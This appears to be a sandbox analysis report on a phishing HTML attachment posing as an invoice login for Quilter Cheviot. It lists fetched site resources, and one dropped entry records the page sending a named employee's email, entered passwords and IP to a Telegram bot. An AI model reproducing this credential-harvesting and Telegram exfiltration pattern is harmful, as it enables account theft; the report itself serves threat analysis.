                                                    SHA-512:B86F8A7A93606338CD2B69AD45A5233ED0A676FA9CAAA64D2937C8F370BABFBBBF1AF918A1AA357E7E406708B7774AA8D638D38FC546A2867F9DC769CB95BF76
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://www.quiltercheviot.com/Content/Fonts/866831/B4C49007D12296CAC.css
                                                    Preview:./*..Copyright (C) 2011-2023 Hoefler & Co...This software is the property of Hoefler & Co. (H&Co)...Your right to access and use this software is subject to the..applicable License Agreement, or Terms of Service, that exists..between you and H&Co. If no such agreement exists, you may not..access or use this software for any purpose...This software may only be hosted at the locations specified in..the applicable License Agreement or Terms of Service, and only..for the purposes expressly set forth therein. You may not copy,..modify, convert, create derivative works from or distribute this..software in any way, or make it accessible to any third party,..without first obtaining the written permission of H&Co...For more information, please visit us at http://typography.com...341602-145411-20230905.*/..@font-face{ font-family: "Gotham SSm A"; src: url(data:application/x-font-woff2;base64,d09GMgABAAAAAEgQABIAAAAArggAAEepAAFNDgAAAAAAAAAAAAAAAAAAAAAAAAAAGh4btwYcgQAGYACINAhOCYJhEQwKgcx8gbZqEqAwA
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:RIFF (little-endian) data, Web/P image
                                                    Category:downloaded
                                                    Size (bytes):9270
                                                    Entropy (8bit):7.961541037542469
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:9A6100F926A2BFC88338A77A3C511B68
                                                    SHA1:BF8BE459CA1D0A4DF49FE1CD2573D987FEB8AC14
                                                    SHA-256:C8165B7DC34B2A29B21C9188BCE617A7519F6259B4465E0B3472880B1017F79B
                                                    SHA-512:DB6F51A7E010B33FAE7BCD7D84C36F256C68CEFB86DF6BD034044EF890F0B5DB19C084D4F6729A1C18C71074A23B1DFD229C7BE0C28881328B9C8455304EEA68
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://www.quiltercheviot.com/4ad25c/globalassets/logos/qc-logos/qcfavicon512x512.png
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:JSON data
                                                    Category:dropped
                                                    Size (bytes):666
                                                    Entropy (8bit):5.221701748723922
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:7AB2342F7A25115DEADD60F3DC269F87
                                                    SHA1:473DC91CEACA49FA50E45D2367FE97A15D270A8E
                                                    SHA-256:8C205E700C20F515147915193D8F12E60A3D90692DB6FA49BDD8ED4AF5F0711B
                                                    SHA-512:B306E01699931EE338EB32BFE2404E7D82BAB0E9D0DD01F3E100D9E103538A9ADEA207D27A01F548A572F03274AB0101F5F6072E23BD28DD9762CC52F92E43D3
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:{"ok":true,"result":{"message_id":635,"from":{"id":6800467599,"is_bot":true,"first_name":"US Unlimited","username":"usunlimitedbot"},"chat":{"id":6522132099,"first_name":"\"Olk","type":"private"},"date":1742906941,"text":"\ud83d\udd39 Second Password Attempt \ud83d\udd39\n\n\ud83d\udce7 Email: charles.mesquita@quiltercheviot.com\n\ud83d\udd11 Password 1: hAhAhA\n\ud83d\udd11 Password 2: RUBBISH\n\ud83c\udf0d IP: 161.77.13.20\n\ud83c\udff3\ufe0f Country: US\n\ud83d\udd17 Login URL: https://mail.mxa-0036ff01.gslb.pphosted.com","entities":[{"offset":41,"length":35,"type":"email"},{"offset":129,"length":12,"type":"url"},{"offset":172,"length":43,"type":"url"}]}}
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text
                                                    Category:downloaded
                                                    Size (bytes):1971
                                                    Entropy (8bit):5.4820143584135
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:D89E3693CBFDE1C900DA2A1471DE9ECC
                                                    SHA1:7FEE5A88DFF28CABE8E216F8BD343461D25ABAE0
                                                    SHA-256:E4F66092B0948F5C03B3609778B2765B1735A959ADEEF22FFED12B44D955FD8A
                                                    SHA-512:ECC58C709221BFC3132ABFD6D112000FE17E3AD9FCE98213930603F7A52331A2D663BB00C1F3F4545C512CB752D47670E432E8FD4D6E148C883CF9ED9C0DA997
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:"https://fonts.googleapis.com/css2?family=Cormorant:ital,wght@1,700&display=swap"
                                                    Preview:/* cyrillic-ext */.@font-face {. font-family: 'Cormorant';. font-style: italic;. font-weight: 700;. font-display: swap;. src: url(https://fonts.gstatic.com/s/cormorant/v21/H4c0BXOCl9bbnla_nHIq6oGzilJm9otsA9kQTPBa4iWq4Ys.woff2) format('woff2');. unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;.}./* cyrillic */.@font-face {. font-family: 'Cormorant';. font-style: italic;. font-weight: 700;. font-display: swap;. src: url(https://fonts.gstatic.com/s/cormorant/v21/H4c0BXOCl9bbnla_nHIq6oGzilJm9otsA9kQTPBa6yWq4Ys.woff2) format('woff2');. unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;.}./* vietnamese */.@font-face {. font-family: 'Cormorant';. font-style: italic;. font-weight: 700;. font-display: swap;. src: url(https://fonts.gstatic.com/s/cormorant/v21/H4c0BXOCl9bbnla_nHIq6oGzilJm9otsA9kQTPBa4CWq4Ys.woff2) format('woff2');. unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (1572)
                                                    Category:downloaded
                                                    Size (bytes):39846
                                                    Entropy (8bit):5.378133485312082
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:0894998DB0FA79BDF9F520EDDA652B7F
                                                    SHA1:4C0BEA18A33CEF56223FB3954F573040E970B9A7
                                                    SHA-256:2A4B3DD37CCBB39268DECD6E8FCB6E58D334DD1A208375EB1DA0259C866624EE
                                                    SHA-512:D6398433D07388ADD9C9A7177D8686DB34A0283F730D72493BFB786BEA2BEBA70A2D5071955E7B12E0C94969AAAF67953839377DD237AE6E56AE283856ADC513
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:"https://fonts.googleapis.com/css2?family=Open+Sans:ital,wght@0,400;0,600;0,700;1,400;1,600;1,700&family=Frank+Ruhl+Libre:wght@300;400;700&display=swap"
                                                    Preview:/* hebrew */.@font-face {. font-family: 'Frank Ruhl Libre';. font-style: normal;. font-weight: 300;. font-display: swap;. src: url(https://fonts.gstatic.com/s/frankruhllibre/v21/j8_w6_fAw7jrcalD7oKYNX0QfAnPW7Ll4ajn.woff2) format('woff2');. unicode-range: U+0307-0308, U+0590-05FF, U+200C-2010, U+20AA, U+25CC, U+FB1D-FB4F;.}./* latin-ext */.@font-face {. font-family: 'Frank Ruhl Libre';. font-style: normal;. font-weight: 300;. font-display: swap;. src: url(https://fonts.gstatic.com/s/frankruhllibre/v21/j8_w6_fAw7jrcalD7oKYNX0QfAnPW77l4ajn.woff2) format('woff2');. unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;.}./* latin */.@font-face {. font-family: 'Frank Ruhl Libre';. font-style: normal;. font-weight: 300;. font-display: swap;. src: url(https://fonts.gstatic.com/s/frankruhllibre/v21/j8_w6_fAw7jrcalD7oKYNX0Qf
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (5985), with no line terminators
                                                    Category:downloaded
                                                    Size (bytes):5985
                                                    Entropy (8bit):5.399300699584419
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:4F955D7F9E008DF9EA534BD688936C57
                                                    SHA1:C4CF1794D4828E43A7BE565E2B0B5CA5B1CCA90B
                                                    SHA-256:D2494539D4A695CC761C69F11D9D00FFC1034D2ED3893519FD03E6F1531B916D
                                                    SHA-512:5EBC0A2819EC7813C1DE357FC2605F9F16D79930748E7B1627E343937AF3BAAFF7BB866109DD4D8066B70EA1E577EECDD28236AA07BBF1ADBD665E60287E8259
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://www.quiltercheviot.com/Util/Find/epi-util/find.js
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:SVG Scalable Vector Graphics image
                                                    Category:dropped
                                                    Size (bytes):32263
                                                    Entropy (8bit):4.871641213360622
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:B27498B828E659CA31193B637C9815F2
                                                    SHA1:866C471C2F1AD751B3C3BD7F3DE39F6B802ABF2F
                                                    SHA-256:2A46DFD5AAC7C00FF2958ADA36D560A87767BBA2ADBC8F966545425B87C37590
                                                    SHA-512:5AD38EDA78BBB3135847B592004A93173404003C12CEA0D27EF9AFE7D03ACA7E42FC8D83922F24B9BD72E20A9F3E70AA318F0A779031D6C1D646DD3C4A94A283
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:<?xml version="1.0" encoding="utf-8"?><svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"><symbol fill="none" viewBox="0 0 27 27" id="address" xmlns="http://www.w3.org/2000/svg"><path d="M.95 25.999v.066l.064-.018 7.59-2.181 7.373 2.055.013.003.013-.003 7.821-2.143.037-.01V12.083H23.11V23.23l-7.075 1.96-7.417-2.055-.013-.003-.014.003-6.888 1.957V8.515l6.902-1.96 4.983 1.383.047.013.014-.047.174-.589.014-.048-.048-.014-5.17-1.47-.014-.004-.014.004L.986 7.967l-.036.01V26z" fill="currentColor" stroke="currentColor" stroke-width=".1"/><path d="M16.388 12.301v-.05H15.636v13.377H16.388V12.301zM9.002 6.167v-.05H8.25v17.41H9.002V6.168z" fill="currentColor" stroke="currentColor" stroke-width=".1"/><path d="M19.69 16.915l.046.05.034-.059.214-.372c.024-.025.037-.05.047-.07v-.001a.171.171 0 01.035-.05c.131-.128.252-.266.371-.402h0c.12-.137.239-.272.367-.396.523-.506 1.002-1.054 1.48-1.6h0s0 0 0 0c1.086-1.218 2.22-2.525 3.005-4.086 1.006-1.946 1.007-3.854.043-5.635-1.
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (1236)
                                                    Category:downloaded
                                                    Size (bytes):20705
                                                    Entropy (8bit):5.470065366668187
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:9E67DCDB1F1B369CB5D5D77EB947102A
                                                    SHA1:EF6A1C09FE34FAD919456157FF0C66BCDC03DF3A
                                                    SHA-256:2E169E8A7BD2F1F80187C99B59ECEAA1E3233D030361802F717D31DA1312323C
                                                    SHA-512:FA1746D661425F6113E2E6884BB35074169FDD4C43345C797945FE10858EDA9A2E68F89CBD8EDC8F0976BF0420690D13FD82C80D217544C839F851C117FFD00E
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://www.googletagmanager.com/static/service_worker/53k0/sw.js?origin=https%3A%2F%2Fwww.quiltercheviot.com
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (65409)
                                                    Category:downloaded
                                                    Size (bytes):122876
                                                    Entropy (8bit):5.398980025961359
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:B17CAEC5470617BB0CB958D86B76AD26
                                                    SHA1:9E05DE6DE80EC3A13A6E1E72C490C0DEF4EF6D66
                                                    SHA-256:12E7192855D64B8867E792C9E0359A8E0B5AE2E2C9286007C9E4B881D86E7E07
                                                    SHA-512:4214CE215830C4A4EDE96C2D7F748B676DD9EB55CE369E6557508E1858DB4DDCFF298DEFC6D1FB743D688801C29614E3036FBA94C7B7F5B5A9E7070A45BD9DF2
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://js.monitor.azure.com/scripts/b/ai.2.gbl.min.js
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:SVG Scalable Vector Graphics image
                                                    Category:downloaded
                                                    Size (bytes):200
                                                    Entropy (8bit):5.0126792595955
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:56B0567965A5A578B0A6BD9500D29F79
                                                    SHA1:E02910CB931CE33F8455E737568B3F91683325EE
                                                    SHA-256:0459640A8FC17DE5038A8AE1842DE5A963C99E715CC4E6321890D3DAB73CC248
                                                    SHA-512:1727E91DADF07601450A2DDE4E0CFCD581944938519BE0D35FC0755D48719E9B0F413AF85A9821B94C95206D681E63B0910C1D0A8BC8CB0C75EDACAD79C475D8
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://www.quiltercheviot.com/Content/images/v3/themes/qc/chevron.svg
                                                    Preview:<svg width="13" height="13" viewBox="0 0 13 13" fill="none". xmlns="http://www.w3.org/2000/svg">. <path d="M5.65576 12L11.3126 6.34315L5.65576 0.686292" stroke="#023843" stroke-width="1.5"/>.</svg>.
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (6129)
                                                    Category:downloaded
                                                    Size (bytes):372190
                                                    Entropy (8bit):5.604347632707114
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:60B8E379BB8191C4709727AD9F233B10
                                                    SHA1:E67C41F64B148B4C8440931097635CA64D4CF7A0
                                                    SHA-256:C3BFECFED8896FD17129935A0ABC87A8A9B3B10433AAE5FB6443714220A4B0BF
                                                    SHA-512:40A3C788DD333BC7301A1EFCE56643C48E61A14049933ABDF9CBD6535752B78A83161C747688DF17775B0FC0585E3D969A79393BAB342CEA18D98CA6D20C37BA
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://www.googletagmanager.com/gtag/js?id=G-SV2T56L986&l=dataLayer&cx=c&gtm=45He53l1h1v76305953za200&tag_exp=102482433~102788824~102803279~102813109
                                                    Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"1",. . "macros":[{"function":"__e"},{"function":"__c","vtp_value":""},{"function":"__c","vtp_value":0},{"function":"__c","vtp_value":""},{"function":"__c","vtp_value":0}],. "tags":[{"function":"__ogt_1p_data_v2","priority":13,"vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_isEnabled":true,"vtp_manualEmailEnabled":false,"vtp_cityValue":"","vtp_autoEmailEnabled":true,"vtp_postalCodeValue":"","vtp_lastNameValue":"","vtp_phoneValue":"","vtp_autoPhoneEnabled":false,"vtp_emailValue":"","vtp_firstNameValue":"","vtp_streetValue":"","vtp_autoAddressEnabled":false,"vtp_regionValue":"","vtp_countryValue":"","vtp_isAutoCollectPiiEnabledFlag":false,"tag_id":6},{"function":"__ccd_ga_first","priority":12,"vtp_instanceDestinationId":"G-SV2T56L986","tag_id":20},{"function":"__set_product_settings","priority":11,"vtp_instanceDestinationI
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:JSON data
                                                    Category:dropped
                                                    Size (bytes):430
                                                    Entropy (8bit):5.155837157818456
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:D3B22219C1744022D045A79772B0363C
                                                    SHA1:3E0FBA97969AB1B9BB918A9D608EAEB2C7722D53
                                                    SHA-256:F6A2B6309A29197D62E31DB1CCE2FBD2C2B37625E087C118A438030BDF24B216
                                                    SHA-512:CB21170676C4B8E023741C0D1490BB3C668CDFA2EB0DC8B2C3B5F32E5813C5D48FDF9E59680551FC605740276F68EB7BDF7F2CD28BBA0D8DA1BD8C7A2A5D9145
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:[{"MessageId":172680,"Title":"Important notice","MessageText":"We are aware of ongoing impersonation fraud attempts.","CtaLinkText":"See more information ","CtaLinkUrl":"https://www.quiltercheviot.com/login/#fraudwarning","OpenInNewTab":false,"EffectiveFrom":"2024-01-10T17:03:00+00:00","EffectiveTo":"9999-12-31T00:00:00Z","MessageType":"platform-issue","Order":1,"LastUpdatedOn":"2024-01-29T09:52:57+00:00","Dismissible":false}]
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (65536), with no line terminators
                                                    Category:downloaded
                                                    Size (bytes):335587
                                                    Entropy (8bit):5.418392229239681
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:9CC69787B5B797967607B4FF515E8A03
                                                    SHA1:85E72D05B1B77F02C93F6554DF74B266D2826A1C
                                                    SHA-256:5A27761ECE752747FC51CB8BB7664A45B4BB8B6BB83DF735B9D5CF13E02DC0D1
                                                    SHA-512:9842B1B794734D4EE37C1194A68B23FD93193EF4786894319216D26BF7BE0223C88DADCEDD1F1C69C4BC507E38EFA4EC48CD1FA6288092DB784C10C022B69B61
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cc.cdn.civiccomputing.com/9/cookieControl-9.9.2.min.js
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (65536), with no line terminators
                                                    Category:downloaded
                                                    Size (bytes):507499
                                                    Entropy (8bit):5.227401749837294
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:C0C3349B0D3E91E2099A81F4E15F0D3A
                                                    SHA1:9949EA6A1E427D4235AEAD4B1FCB7CD142F51DC5
                                                    SHA-256:05B82BE7161C76AB88B69789928674CB8EC55C2ACF9FB00A8739785BC231D67C
                                                    SHA-512:5CF2BD598851264B444FE6C872A2A40A974D7A64E9C6C1D97CD1C7C7FD3A22547B5FD08B14D424F231FAE77F489EE77BDEBA96A16AB4496CA83834E6DAF3D8D3
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://www.quiltercheviot.com/Content/css/dist/v3/global.css?v=2.5.0.20037
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (26254)
                                                    Category:downloaded
                                                    Size (bytes):26439
                                                    Entropy (8bit):5.4566708152893995
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:3EDCE381FC3DCC5CB83A9EB9518CF4B5
                                                    SHA1:7078776B85499968942E9415D9A512F468EA628E
                                                    SHA-256:8C2902F97FA93B60570005F4402CE83CD5C324A03B5D8D65B87DA5FD3A736F56
                                                    SHA-512:061F19F24B8C890296D233BECEF47623695B4613747863A7DEEF21C4E388538E086598F0BCD7CBCB3757C50F4FB684CAEBC8F985022A73DB327109DBC1195509
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cdnjs.cloudflare.com/ajax/libs/jsrender/1.0.6/jsrender.min.js
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (30161)
                                                    Category:downloaded
                                                    Size (bytes):421081
                                                    Entropy (8bit):5.591382505638177
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:282349C0C608DA746DF39F39F029183F
                                                    SHA1:9EE19073469211781C4DAD3CE135CAD6C1832304
                                                    SHA-256:0C019D131D35724FDC19EB3EF6A7D414343C93725576D50B8B6E22743B9185C9
                                                    SHA-512:ECD3AF41C8F3B98BBF25384034FDEB4BC961E093F9FB455D25624A8F6F46A09EB5739271C84ECC15B2C170FACE88582A9D0755FB7E9D9508340F12DB39FB2520
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://www.googletagmanager.com/gtm.js?id=GTM-T2ZBL4Q
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:SVG Scalable Vector Graphics image
                                                    Category:dropped
                                                    Size (bytes):225
                                                    Entropy (8bit):4.988549602499535
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:BC9FA4D40AE320A61C18FF06DCF6F1E5
                                                    SHA1:7FACE91B9D9C039C0C4DDECD412CC3569445B866
                                                    SHA-256:691C9F163F0F6F4BFF87B1E7197F86333D3687B3DDFD145CC371C9680ECBE704
                                                    SHA-512:116DA260F9623578E73E30A4A4DAC78CEA61381C946ED314E99E48CDDF5FC4202C634679AA65E8B8D9B4874F3C1C941E1DE429B85595C1BA08B87A976AB58AA5
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:<svg width="25" height="25" viewBox="0 0 25 25" fill="none". xmlns="http://www.w3.org/2000/svg">. <circle cx="12.5" cy="12.5" r="12" stroke="#023843"/>. <path d="M8 13.5714L11.1765 16.25L17 8.75" stroke="#023843"/>.</svg>.
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:JSON data
                                                    Category:dropped
                                                    Size (bytes):320
                                                    Entropy (8bit):4.928665435468996
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:27FD373FE536122A6CBC67C7E00C5865
                                                    SHA1:E60FEEE18E60724D2A4972112705D11EB2F76592
                                                    SHA-256:CA6F87EF6A21587F88B14F18F53971C1B6286F72902B0635EA5EE33CA6037701
                                                    SHA-512:A3CCDFB17F0BFDF6B51E4E8F1AF4AF8300D63C76763F7344E7489C8775B2EAB34CD202D0BA5337257E4C5F2E9709CF033D354C8E1449369DB48F9C29CD50B083
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:{"Status":0,"TC":false,"RD":true,"RA":true,"AD":false,"CD":false,"Question":[{"name":"quiltercheviot.com.","type":15}],"Answer":[{"name":"quiltercheviot.com.","type":15,"TTL":300,"data":"10 mxb-0036ff01.gslb.pphosted.com."},{"name":"quiltercheviot.com.","type":15,"TTL":300,"data":"10 mxa-0036ff01.gslb.pphosted.com."}]}
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:Unicode text, UTF-8 text, with very long lines (34544)
                                                    Category:downloaded
                                                    Size (bytes):2534458
                                                    Entropy (8bit):5.2204058745013295
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:BC70276C7D0648454BC55A6EBEB78835
                                                    SHA1:762C274ECC28EEFF9E9B7A89C164C2905C7B27A3
                                                    SHA-256:CF3284A2E7015755920B1F9D490F80796942D524250FD3393757355EE370BE69
                                                    SHA-512:D3847C12A666979E8A114123DC7478C9B6B8F520D0A5E3D1ECAE5D2C6B33611B7FE626E9C21751473F7F182CED238C59084F932394DC42E605DB1649E3F3BA2D
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://www.quiltercheviot.com/scripts/global-v3.js?v=2.5.0.20037
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:JSON data
                                                    Category:dropped
                                                    Size (bytes):281
                                                    Entropy (8bit):5.112970080305849
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:DDE6425C80E0932E7850A7F8E8F74EBB
                                                    SHA1:0276923F3FBED46A523478E049471A3C99C80E68
                                                    SHA-256:1F5BD6A957C31847FB116EEA161BFE31647C66CCFC6D450814719B97F796368D
                                                    SHA-512:F24D9F25EFF2F13D4C928BBE35338621B4F784F1E0AD5E55ECD9013E509A59E7BF7173BFA84E6BD49F33314CD0F5CCF76372C15BB13AAEF751F51353AF3023CD
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:{. "ip": "161.77.13.20",. "city": "New York City",. "region": "New York",. "country": "US",. "loc": "40.7143,-74.0060",. "org": "AS7849 CROCKER COMMUNICATIONS, INCORPORATED",. "postal": "10001",. "timezone": "America/New_York",. "readme": "https://ipinfo.io/missingauth".}
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:SVG Scalable Vector Graphics image
                                                    Category:dropped
                                                    Size (bytes):922
                                                    Entropy (8bit):4.4550859949905135
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:FEEF2A0D452AC6FADB299412B2037D6D
                                                    SHA1:15A46E7B65405FC80977A6D34FBF175681647422
                                                    SHA-256:91C4EA1B0702F77B707417EA33B157FF4CBB62F651C51F6578273638FA7DBB69
                                                    SHA-512:680174627ADC98B74CDD4F5F7043B338A6407CCCFA40E342364B9C5478A832F969ADE10237CDF5F1429F4D16DF06C6B2EE491F8B2F98D9996B091564B31EDBCC
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:<svg width="25" height="26" viewBox="0 0 25 26" fill="none". xmlns="http://www.w3.org/2000/svg">. <path fill-rule="evenodd" clip-rule="evenodd" d="M15.6106 16.3729L14.9998 16.631V17.2941V19.5H9.99976V17.2941V16.631L9.38895 16.3729C6.51413 15.1583 4.49976 12.3132 4.49976 9C4.49976 4.58172 8.08148 1 12.4998 1C16.918 1 20.4998 4.58172 20.4998 9C20.4998 12.3132 18.4854 15.1583 15.6106 16.3729ZM21.4998 9C21.4998 12.7292 19.2317 15.9286 15.9998 17.2941V19.5V20.5H14.9998H9.99976H8.99976V19.5V17.2941C5.76781 15.9286 3.49976 12.7292 3.49976 9C3.49976 4.02944 7.52919 0 12.4998 0C17.4703 0 21.4998 4.02944 21.4998 9ZM12.9998 3.5C13.6555 3.5 14.7863 3.97651 15.7726 4.95497C16.7387 5.91332 17.4998 7.29127 17.4998 9H18.4998C18.4998 6.9754 17.5941 5.35335 16.4769 4.24503C15.3799 3.15682 14.0106 2.5 12.9998 2.5V3.5ZM14.7976 25.0035H10.2V24.0035H14.7976V25.0035ZM8.99976 23H15.9998V22H8.99976V23Z" fill="#023843"/>.</svg>.
                                                    File type:HTML document, ASCII text, with very long lines (15237), with CRLF line terminators
                                                    Entropy (8bit):6.009435221121203
                                                    TrID:
                                                    • HyperText Markup Language (15015/1) 20.56%
                                                    • HyperText Markup Language (12001/1) 16.44%
                                                    • HyperText Markup Language (12001/1) 16.44%
                                                    • HyperText Markup Language (11501/1) 15.75%
                                                    • HyperText Markup Language (11501/1) 15.75%
                                                    File name:Invoice_charles.mesquita_PaymentUpdate.html
                                                    File size:17'483 bytes
                                                    MD5:dc90cca6cc296a6750140d5ada2ae0a4
                                                    SHA1:ed093e3d9dfb92d7f1c481b17655ed8eb9aa0bdc
                                                    SHA256:18510c0f3b951e1f348a99ef04725cb19162508a762ae3340e0ef8d251819011
                                                    SHA512:a5a8c508626a037daa0ae1ab6857b03aa5c3d00bc37a11ca481acdb5edb101cbfbb4b230abde7d19c0e95cdc536e4dcd85f8298a53e0eeb60cf5ad83fff2cc7a
                                                    SSDEEP:384:L+KJRwgIPj0p+txC/lR4po3ZSUt7X4H6cfIjILP6pWfxGILuoxxxHx6gn:wFjYggjppWfxG4jd5n
                                                    TLSH:A272E8A87F9235F873B507DF1B355541DA00CE8EE2864148BD3C25897F74B0AAC63B69
                                                    File Content Preview:<!DOCTYPE html>..<html lang="en">..<head>.. <meta charset="UTF-8">.. <meta name="viewport" content="width=device-width, initial-scale=1.0">.. <title>Login</title>.. <style>.. body {.. margin: 0;.. padding: 0;..
                                                    Icon Hash:1270ce868a8686b8